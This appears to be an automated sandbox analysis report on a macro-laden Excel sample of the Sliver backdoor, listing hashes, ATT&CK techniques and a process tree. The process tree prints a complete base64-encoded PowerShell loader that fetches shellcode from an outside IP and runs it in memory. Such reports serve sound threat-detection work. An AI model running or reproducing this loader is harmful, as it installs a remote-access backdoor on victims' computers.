sliver | 4ec853d9972a4da2aee5ceb0d7820b0bf419a26f0e2a90d06e9562ae80d94a31

General

Target

4ec853d9972a4da2aee5ceb0d7820b0bf419a26f0e2a90d06e9562ae80d94a31.xls
Size

46KB
MD5

8b242d19bd9a2b1186f4ef8de0c4ffa2
SHA1

ac9651800cf0296ef5f545b18eca8b72cf40c9ca
SHA256

4ec853d9972a4da2aee5ceb0d7820b0bf419a26f0e2a90d06e9562ae80d94a31
SHA512

89f4221b4eb13128f568dc118c5bf171d9d955e474fec94d8a5139af1afcd4d42a3949aeb32f151178a8168f42885ecf10b6046d68951386df8580d3f1bc565a
SSDEEP

768:r4SFsv66g3KnF439NKC54kkGfn+cL2XdA8YRtukODXwXqt7sNAQYzKEm8ZRu9Uzp:8SFsv66g3KnF439NKC54kkGfn+cL2Xd+

Score

10^/10

sliver backdoor discovery execution trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://194.182.164.149:8080/fontawesome.woff

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powershell.exe

description	pid	pid_target	Process	procid_target
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	3028	1712	powershell.exe	29

Sliver RAT v2 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/3028-45-0x0000000006A50000-0x00000000074CE000-memory.dmp	SliverRAT_v2

Sliver family
sliver
SliverRAT
SliverRAT is an open source Adversary Emulation Framework.
trojan backdoor sliver

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow	pid	Process
4	3028	powershell.exe
6	3028	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

Processes:

powershell.exe

pid	Process
3028	powershell.exe

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

EXCEL.EXEpowershell.execsc.execvtres.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe

Office loads VBA resources, possible macro or embedded object present

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid	Process
1712	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid	Process
3028	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description	pid	Process
Token: SeDebugPrivilege	3028	powershell.exe

Suspicious use of SetWindowsHookEx 5 IoCs

Processes:

EXCEL.EXE

pid	Process
1712	EXCEL.EXE
1712	EXCEL.EXE
1712	EXCEL.EXE
1712	EXCEL.EXE
1712	EXCEL.EXE

Suspicious use of WriteProcessMemory 12 IoCs

Processes:

EXCEL.EXEpowershell.execsc.exe

description	pid	Process	procid_target
PID 1712 wrote to memory of 3028	1712	EXCEL.EXE	30
PID 1712 wrote to memory of 3028	1712	EXCEL.EXE	30
PID 1712 wrote to memory of 3028	1712	EXCEL.EXE	30
PID 1712 wrote to memory of 3028	1712	EXCEL.EXE	30
PID 3028 wrote to memory of 2156	3028	powershell.exe	32
PID 3028 wrote to memory of 2156	3028	powershell.exe	32
PID 3028 wrote to memory of 2156	3028	powershell.exe	32
PID 3028 wrote to memory of 2156	3028	powershell.exe	32
PID 2156 wrote to memory of 2992	2156	csc.exe	33
PID 2156 wrote to memory of 2992	2156	csc.exe	33
PID 2156 wrote to memory of 2992	2156	csc.exe	33
PID 2156 wrote to memory of 2992	2156	csc.exe	33

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\4ec853d9972a4da2aee5ceb0d7820b0bf419a26f0e2a90d06e9562ae80d94a31.xls
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1712
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -nop -w hidden -Enc JABXAGkAbgAzADIAIAA9ACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAbgBzAGkAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAANAAoAIAAgACAAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsAA0ACgAgACAAIAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwADQAKACAAIAAgACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAVQBJAG4AdAAzADIAIABXAGEAaQB0AEYAbwByAFMAaQBuAGcAbABlAE8AYgBqAGUAYwB0ACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABoAEgAYQBuAGQAbABlACwADQAKACAAIAAgACAAVQBJAG4AdAAzADIAIABkAHcATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAKQA7AA0ACgB9AA0ACgAiAEAADQAKAEEAZABkAC0AVAB5AHAAZQAgACQAVwBpAG4AMwAyAA0ACgANAAoAIwAgAEkAUwBDAHsAaABlAGMAYQByAG0AZQBuAF8AdwBhAHMAXwBoAGUAcgBlAH0ADQAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AIAA7AA0ACgAkAHMAaABlAGwAbABjAG8AZABlACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAEwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAiAGgAdAB0AHAAcwA6AC8ALwAxADkANAAuADEAOAAyAC4AMQA2ADQALgAxADQAOQA6ADgAMAA4ADAALwBmAG8AbgB0AGEAdwBlAHMAbwBtAGUALgB3AG8AZgBmACIAKQANAAoAaQBmACAAKAAkAHMAaABlAGwAbABjAG8AZABlACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsARQB4AGkAdAB9ADsADQAKACQAcwBpAHoAZQAgAD0AIAAkAHMAaABlAGwAbABjAG8AZABlAC4ATABlAG4AZwB0AGgADQAKAA0ACgBbAEkAbgB0AFAAdAByAF0AJABhAGQAZAByACAAPQAgAFsAVwBpAG4AMwAyAF0AOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsACQAcwBpAHoAZQAsADAAeAAxADAAMAAwACwAMAB4ADQAMAApADsADQAKAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAHMAaABlAGwAbABjAG8AZABlACwAIAAwACwAIAAkAGEAZABkAHIALAAgACQAcwBpAHoAZQApAA0ACgAkAHQAaABhAG4AZABsAGUAPQBbAFcAaQBuADMAMgBdADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABhAGQAZAByACwAMAAsADAALAAwACkAOwANAAoAWwBXAGkAbgAzADIAXQA6ADoAVwBhAGkAdABGAG8AcgBTAGkAbgBnAGwAZQBPAGIAagBlAGMAdAAoACQAdABoAGEAbgBkAGwAZQAsACAAWwB1AGkAbgB0ADMAMgBdACIAMAB4AEYARgBGAEYARgBGAEYARgAiACkA
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3028
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mhodx0cn.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2156
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBB93.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCBB92.tmp"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2992

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\CabC812.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESBB93.tmp

Filesize
1KB

MD5
c0541f17a47b00cc1b3eea34d7290ad9

SHA1
d08301838dcdd9705b99bbdd0158db45bec270bf

SHA256
dea0e3e33cdadbc895058bfc6f158854ded0828a2bb8a62c2a17076ac8ec4e58

SHA512
1ae2dfd912c1e4cdd5c1ad458e1e4d1259b49ce4e212db1fef6c3bdb2b1daea5a9da17538790ec92805f05a985954c761cd7145f060a6e177f4a2c5c8aadc763

Download Submit
C:\Users\Admin\AppData\Local\Temp\mhodx0cn.dll

Filesize
3KB

MD5
5a73659333d8c4957af4726084548a8b

SHA1
862a185642af275ab7e14318989680dbe794a94b

SHA256
81a51fbb3453f49f8a8619d10663c088d053991e45bccc7f11b29ae4063b81c0

SHA512
93afd454a616e045292f7b96d0f1c87e5dbf068297768319f1f694de06a9cad759769c660f929568d9718d2d52ae82f686e0f83975b3ea81ada0c561305824b6

Download Submit
C:\Users\Admin\AppData\Local\Temp\mhodx0cn.pdb

Filesize
7KB

MD5
a0c1ec41e15e08aa76af49dece8d4c09

SHA1
737dcdddf1970b1f2f732d4def0cee3b05038f2b

SHA256
c18431be8cf7b4e60eb5303d6ab0ad1f46f60863ea9b904856882e7bb7f0566c

SHA512
666db975533821fe9f79303311f44bf0bdc5c91d6fdce76064b91bc4808d286e8aa54ce082c80c9d52b2404cb3a5ff80bfb9387baa7cab4e71fd2525f510ea96

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCBB92.tmp

Filesize
652B

MD5
f3c88107c5bbb4c028086de6b437c740

SHA1
45f2a077478f0cca3e01d07e1c53a19adf165655

SHA256
e0982c61cb9305015306ed6db426edcf8eab1442ea2e1897267172b7b26905de

SHA512
5aeb51dfed70063a4f5b03f30e45aeaa1677d7f051a6221f50703e7b0d1eed62620d628e6bc7d4914b67d9e98342dce2b7152b3f64fbd73df2030810cf3e9275

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\mhodx0cn.0.cs

Filesize
631B

MD5
f4dd5c682eb7b3b679f084261bfc7c4c

SHA1
70f75d7a4e42c185eb09139ed3c6f7338a2219c2

SHA256
2908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319

SHA512
8f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\mhodx0cn.cmdline

Filesize
309B

MD5
6802bbd6ff74706dc202629b1ab249d7

SHA1
7caba32fdd16d5587ab2fdf91e4189c6bdf39f01

SHA256
b60e21b462cc17c324db55a46859563d5bf9142fbdef5e9846a775dffffe124d

SHA512
8bcb649a4b1a63fdc7f2ef5f0150de2f00d78bc8b0446778e7052d3f39f3113048b28201c5442034bd6ac56d300cd166461b32ef9a563b25f00d30825f4aa824

Download Submit
memory/1712-9-0x0000000000730000-0x0000000000830000-memory.dmp

Filesize
1024KB

Download
memory/1712-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1712-2-0x0000000000730000-0x0000000000830000-memory.dmp

Filesize
1024KB

Download
memory/1712-3-0x0000000000730000-0x0000000000830000-memory.dmp

Filesize
1024KB

Download
memory/1712-6-0x0000000000730000-0x0000000000830000-memory.dmp

Filesize
1024KB

Download
memory/1712-8-0x0000000000730000-0x0000000000830000-memory.dmp

Filesize
1024KB

Download
memory/1712-1-0x000000007258D000-0x0000000072598000-memory.dmp

Filesize
44KB

Download
memory/1712-44-0x0000000000730000-0x0000000000830000-memory.dmp

Filesize
1024KB

Download
memory/1712-43-0x000000007258D000-0x0000000072598000-memory.dmp

Filesize
44KB

Download
memory/1712-47-0x0000000000730000-0x0000000000830000-memory.dmp

Filesize
1024KB

Download
memory/3028-45-0x0000000006A50000-0x00000000074CE000-memory.dmp

Filesize
10.5MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads